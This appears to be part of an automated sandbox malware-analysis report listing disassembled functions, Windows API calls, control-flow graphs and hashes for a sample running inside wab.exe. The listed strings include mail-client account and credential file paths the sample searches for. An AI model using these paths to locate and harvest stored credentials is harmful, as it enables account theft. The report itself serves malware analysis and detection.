                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D8A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1454806937-0
                                                                                                                                                                                                          • Opcode ID: 7e5e21239ebc98aae95431dc708b78b5bee6b469cc7033d15bce374e08ecc32d
                                                                                                                                                                                                          • Instruction ID: 3725977526919950f0daec1ff56fa10e508433aa9c767d1092aa77281866ca1c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e5e21239ebc98aae95431dc708b78b5bee6b469cc7033d15bce374e08ecc32d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B2135B194121CBFEB14ABA48C8DEEB76BCEB48358F401965F611F2140E6749E468B71
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 375639BE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 294 375639be-375639c8 295 37563a6e-37563a71 294->295 296 37563a77 295->296 297 375639cd-375639dd 295->297 298 37563a79-37563a7d 296->298 299 375639df-375639e2 297->299 300 375639ea-37563a03 LoadLibraryExW 297->300 301 37563a6b 299->301 302 375639e8 299->302 303 37563a55-37563a5e 300->303 304 37563a05-37563a0e GetLastError 300->304 301->295 305 37563a67-37563a69 302->305 303->305 308 37563a60-37563a61 FreeLibrary 303->308 306 37563a45 304->306 307 37563a10-37563a22 call 375655f6 304->307 305->301 309 37563a7e-37563a80 305->309 311 37563a47-37563a49 306->311 307->306 314 37563a24-37563a36 call 375655f6 307->314 308->305 309->298 311->303 313 37563a4b-37563a53 311->313 313->301 314->306 317 37563a38-37563a43 LoadLibraryExW 314->317 317->311
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                          • API String ID: 0-537541572
                                                                                                                                                                                                          • Opcode ID: 546d210e84f5c3aa6d6b4f70e816928699c935e318b00916690cf7f29769274c
                                                                                                                                                                                                          • Instruction ID: ecec811a404c804b1d919a09645154bf688be4a1b153f108107d3f14c0cda8b5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 546d210e84f5c3aa6d6b4f70e816928699c935e318b00916690cf7f29769274c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB110D76A41321BBDB199A398C4DB1A37589F297B8F003621FC05B7281EF35ED01D6D0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37561000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 37561038
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3756104B
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 37561061
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 37561075
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 37561090
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 375610B8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3594823470-0
                                                                                                                                                                                                          • Opcode ID: 95a8692bd516e629247653a2111481d0461eaae2fdc1e101ff5e00497d47eaed
                                                                                                                                                                                                          • Instruction ID: 06d33efb468468d045d8361ac3cfe364dfd7c17e96f1b005d4d70717cef54b7d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95a8692bd516e629247653a2111481d0461eaae2fdc1e101ff5e00497d47eaed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7521A675900318ABCF58EA64DC4CDEB3738EF84338F105556E895A71A1EE349A85CB41
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 375611EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 37561E89: lstrlenW.KERNEL32(?,?,?,?,?,375610DF,?,?,?,00000000), ref: 37561E9A
                                                                                                                                                                                                            • Part of subcall function 37561E89: lstrcatW.KERNEL32(?,?), ref: 37561EAC
                                                                                                                                                                                                            • Part of subcall function 37561E89: lstrlenW.KERNEL32(?,?,375610DF,?,?,?,00000000), ref: 37561EB3
                                                                                                                                                                                                            • Part of subcall function 37561E89: lstrlenW.KERNEL32(?,?,375610DF,?,?,?,00000000), ref: 37561EC8
                                                                                                                                                                                                            • Part of subcall function 37561E89: lstrcatW.KERNEL32(?,375610DF), ref: 37561ED3
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3756122A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                          • API String ID: 1475205934-1520055953
                                                                                                                                                                                                          • Opcode ID: 957e1d69d283eeefec265f102e3c714fedc7994ba636bedfb177471744500473
                                                                                                                                                                                                          • Instruction ID: d63e41163a63f5637122dceb18a44e4e4c6934d0f1ae53173223e504392be236
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 957e1d69d283eeefec265f102e3c714fedc7994ba636bedfb177471744500473
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C321D5B9E102486BEB1897A0EC85FFD7339EF80718F501546F604EB1D0EAB55E80875A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37564B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 358 37564b39-37564b61 GetModuleHandleExW 359 37564b86-37564b8a 358->359 360 37564b63-37564b76 GetProcAddress 358->360 363 37564b95-37564ba2 call 37562ada 359->363 364 37564b8c-37564b8f FreeLibrary 359->364 361 37564b85 360->361 362 37564b78-37564b83 360->362 361->359 362->361 364->363
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,37564AEA,?,?,37564A8A,?,37572238,0000000C,37564BBD,00000000,00000000), ref: 37564B59
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 37564B6C
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,37564AEA,?,?,37564A8A,?,37572238,0000000C,37564BBD,00000000,00000000,?,37562082), ref: 37564B8F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                          • Opcode ID: c80daf5853d3e2691a1842ea80705380fd3ced08b481ffd08a24ae9621d02eb8
                                                                                                                                                                                                          • Instruction ID: affffb8e3c742ef2fc284ba6f2ecb976d61f1244fdfed60b0ed87ea22356179e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c80daf5853d3e2691a1842ea80705380fd3ced08b481ffd08a24ae9621d02eb8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF08171940208BFCF19AB94C80DB9D7FB9EF08366F401155F805B2150DB3A9E42CA91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37569492 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 368 37569492-375694ef GetConsoleCP 369 375694f5-37569511 368->369 370 37569632-37569644 call 37562ada 368->370 372 37569513-3756952a 369->372 373 3756952c-3756953d call 37567c19 369->373 375 37569566-37569575 call 375679e6 372->375 380 37569563-37569565 373->380 381 3756953f-37569542 373->381 375->370 382 3756957b-3756959b WideCharToMultiByte 375->382 380->375 383 37569548-3756955a call 375679e6 381->383 384 37569609-37569628 381->384 382->370 385 375695a1-375695b7 WriteFile 382->385 383->370 390 37569560-37569561 383->390 384->370 388 3756962a-37569630 GetLastError 385->388 389 375695b9-375695ca 385->389 388->370 389->370 391 375695cc-375695d0 389->391 390->382 392 375695d2-375695f0 WriteFile 391->392 393 375695fe-37569601 391->393 392->388 394 375695f2-375695f6 392->394 393->369 395 37569607 393->395 394->370 396 375695f8-375695fb 394->396 395->370 396->393
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,37569C07,?,00000000,?,00000000,00000000), ref: 375694D4
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 37569590
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,37569C07,00000000,?,?,?,?,?,?,?,?,?,37569C07,?), ref: 375695AF
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,37569C07,00000000,?,?,?,?,?,?,?,?,?,37569C07,?), ref: 375695E8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 977765425-0
                                                                                                                                                                                                          • Opcode ID: ca9ba879dcbdecf6a10645baeec3cf915f779b66c9188481e12fd1f161cdc084
                                                                                                                                                                                                          • Instruction ID: c563a562d1d13ae18992308b4117b159141c5cee4558a9092646b54e40bcd3d8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca9ba879dcbdecf6a10645baeec3cf915f779b66c9188481e12fd1f161cdc084
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0351A3B19003859FDB04CFA8C899AEEFBB4EF08314F10551EE551F7281E774A942CBA1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37561E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,375610DF,?,?,?,00000000), ref: 37561E9A
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 37561EAC
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,375610DF,?,?,?,00000000), ref: 37561EB3
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,375610DF,?,?,?,00000000), ref: 37561EC8
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,375610DF), ref: 37561ED3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                          • Opcode ID: 3c33c1a114387f8e74385155e8b707fe3e6dfc84240105b26c203ef47445799e
                                                                                                                                                                                                          • Instruction ID: 8e144a9fb5232b5ebdb23b938c610f604a4f77ae81c450d76a54e982d991e5e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c33c1a114387f8e74385155e8b707fe3e6dfc84240105b26c203ef47445799e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0B43A5402107AD629375AAC89E7F7B7CEFC5B70F400019F508A3180EB59684283A5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 375615DA Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3756190E,?,?,00000000,?,00000000), ref: 37561643
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 3756165A
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,3756190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 37561661
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?), ref: 37561686
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1475610065-0
                                                                                                                                                                                                          • Opcode ID: e2b22d822c05cd1d3bdd34bc2efa67546ab7a2567fbbc6453163d9044ddcaa61
                                                                                                                                                                                                          • Instruction ID: 6422d5877d9d15a09f48c25c600af95b7a8efeadb6fae63a270ebb3a5279d264
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2b22d822c05cd1d3bdd34bc2efa67546ab7a2567fbbc6453163d9044ddcaa61
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21C836900204BBDB089F64DC85EFE77B8EF88725F14541BE504BB140EB38A64287A6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37567153 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 3756715C
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3756717F
                                                                                                                                                                                                            • Part of subcall function 375656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37565702
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 375671A5
                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 375671C7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                                          • Opcode ID: 02d83b21a1e30d8fabdfac25bde4ddc4b67f1242d8777c903afa28cba4d21fd9
                                                                                                                                                                                                          • Instruction ID: 67ebc5e00cc21498955dbe609f0bd2f414bacc848fd09880e86d9ff834e87912
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02d83b21a1e30d8fabdfac25bde4ddc4b67f1242d8777c903afa28cba4d21fd9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF0184F66453157B27191ABA4C8CD7B6A6DDBC2EB8750192FBD04E7200EE799C0281F1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37565CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,37561D66,00000000,00000000,?,37565C88,37561D66,00000000,00000000,00000000,?,37565E85,00000006,FlsSetValue), ref: 37565D13
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,37565C88,37561D66,00000000,00000000,00000000,?,37565E85,00000006,FlsSetValue,3756E190,FlsSetValue,00000000,00000364,?,37565BC8), ref: 37565D1F
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,37565C88,37561D66,00000000,00000000,00000000,?,37565E85,00000006,FlsSetValue,3756E190,FlsSetValue,00000000), ref: 37565D2D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                          • Opcode ID: b40b2a5f58c7d506d4800dcde62cef16358c5be576c2aa3a93842245d98ef1b9
                                                                                                                                                                                                          • Instruction ID: ec1cdb48f944eea0efab8cbb275bce02ee8597245b53b688877c421ef31b7ea8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b40b2a5f58c7d506d4800dcde62cef16358c5be576c2aa3a93842245d98ef1b9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C014C362C2322ABD7595E2CCC4DB463768AF057F4B101E20FB15F7180DB25D502C6D0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 375669F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetOEMCP.KERNEL32(00000000,?,?,37566C7C,?), ref: 37566A1E
                                                                                                                                                                                                          • GetACP.KERNEL32(00000000,?,?,37566C7C,?), ref: 37566A35
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: |lV7
                                                                                                                                                                                                          • API String ID: 0-356298145
                                                                                                                                                                                                          • Opcode ID: 6f6b7ad230db2c7b8c62f4f40b750d29e02c32ce9ffeeac441d1f97acc32121b
                                                                                                                                                                                                          • Instruction ID: 2c0b71e0690ee2d7b668cd02e30c8aa5bcc3f21f2313ab353a2361d0e65497b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f6b7ad230db2c7b8c62f4f40b750d29e02c32ce9ffeeac441d1f97acc32121b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2F06934841288CFEB08DF68C8497683B70EB0037DF546745E428AA1C4EF7A98878B42
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:7%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                          Signature Coverage:1.1%
                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                          Total number of Limit Nodes:77
                                                                                                                                                                                                          execution_graph 40411 441819 40414 430737 40411->40414 40413 441825 40415 430756 40414->40415 40425 43076d 40414->40425 40416 430774 40415->40416 40417 43075f 40415->40417 40429 43034a memcpy 40416->40429 40428 4169a7 11 API calls 40417->40428 40420 4307ce 40421 430819 memset 40420->40421 40423 415b2c 11 API calls 40420->40423 40421->40425 40422 43077e 40422->40420 40422->40425 40426 4307fa 40422->40426 40424 4307e9 40423->40424 40424->40421 40424->40425 40425->40413 40430 4169a7 11 API calls 40426->40430 40428->40425 40429->40422 40430->40425 37675 442ec6 19 API calls 37851 4152c6 malloc 37852 4152e2 37851->37852 37853 4152ef 37851->37853 37855 416760 11 API calls 37853->37855 37855->37852 37856 4232e8 37857 4232ef 37856->37857 37860 415b2c 37857->37860 37859 423305 37861 415b42 37860->37861 37866 415b46 37860->37866 37862 415b94 37861->37862 37863 415b5a 37861->37863 37861->37866 37867 4438b5 37862->37867 37865 415b79 memcpy 37863->37865 37863->37866 37865->37866 37866->37859 37868 4438d0 37867->37868 37874 4438c9 37867->37874 37881 415378 memcpy memcpy 37868->37881 37874->37866 37882 4466f4 37901 446904 37882->37901 37884 446700 GetModuleHandleA 37887 446710 __set_app_type __p__fmode __p__commode 37884->37887 37886 4467a4 37888 4467ac __setusermatherr 37886->37888 37889 4467b8 37886->37889 37887->37886 37888->37889 37902 4468f0 _controlfp 37889->37902 37891 4467bd _initterm __wgetmainargs _initterm 37893 44681e GetStartupInfoW 37891->37893 37894 446810 37891->37894 37895 446866 GetModuleHandleA 37893->37895 37903 41276d 37895->37903 37899 446896 exit 37900 44689d _cexit 37899->37900 37900->37894 37901->37884 37902->37891 37904 41277d 37903->37904 37946 4044a4 LoadLibraryW 37904->37946 37906 412785 37938 412789 37906->37938 37954 414b81 37906->37954 37909 4127c8 37960 412465 memset ??2@YAPAXI 37909->37960 37911 4127ea 37972 40ac21 37911->37972 37916 412813 37990 40dd07 memset 37916->37990 37917 412827 37995 40db69 memset 37917->37995 37920 412822 38016 4125b6 ??3@YAXPAX 37920->38016 37922 40ada2 _wcsicmp 37923 41283d 37922->37923 37923->37920 37926 412863 CoInitialize 37923->37926 38000 41268e 37923->38000 38020 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37926->38020 37930 41296f 38022 40b633 37930->38022 37933 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37937 412957 37933->37937 37943 4128ca 37933->37943 37937->37920 37938->37899 37938->37900 37939 4128d0 TranslateAcceleratorW 37940 412941 GetMessageW 37939->37940 37939->37943 37940->37937 37940->37939 37941 412909 IsDialogMessageW 37941->37940 37941->37943 37942 4128fd IsDialogMessageW 37942->37940 37942->37941 37943->37939 37943->37941 37943->37942 37944 41292b TranslateMessage DispatchMessageW 37943->37944 37945 41291f IsDialogMessageW 37943->37945 37944->37940 37945->37940 37945->37944 37947 4044cf GetProcAddress 37946->37947 37951 4044f7 37946->37951 37948 4044e8 FreeLibrary 37947->37948 37949 4044df 37947->37949 37950 4044f3 37948->37950 37948->37951 37949->37948 37950->37951 37952 404507 MessageBoxW 37951->37952 37953 40451e 37951->37953 37952->37906 37953->37906 37955 414b8a 37954->37955 37956 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37954->37956 38026 40a804 memset 37955->38026 37956->37909 37959 414b9e GetProcAddress 37959->37956 37962 4124e0 37960->37962 37961 412505 ??2@YAPAXI 37963 41251c 37961->37963 37965 412521 37961->37965 37962->37961 38048 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37963->38048 38037 444722 37965->38037 38053 40b1ab ??3@YAXPAX ??3@YAXPAX 37972->38053 37976 40ad4b 37985 40ad76 37976->37985 38077 40a9ce 37976->38077 37977 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37983 40ac5c 37977->37983 37979 40ace7 ??3@YAXPAX 37979->37983 37983->37976 37983->37977 37983->37979 37983->37985 38057 40a8d0 37983->38057 38069 4099f4 37983->38069 37984 40a8d0 7 API calls 37984->37985 38054 40aa04 37985->38054 37986 40ada2 37987 40adc9 37986->37987 37989 40adaa 37986->37989 37987->37916 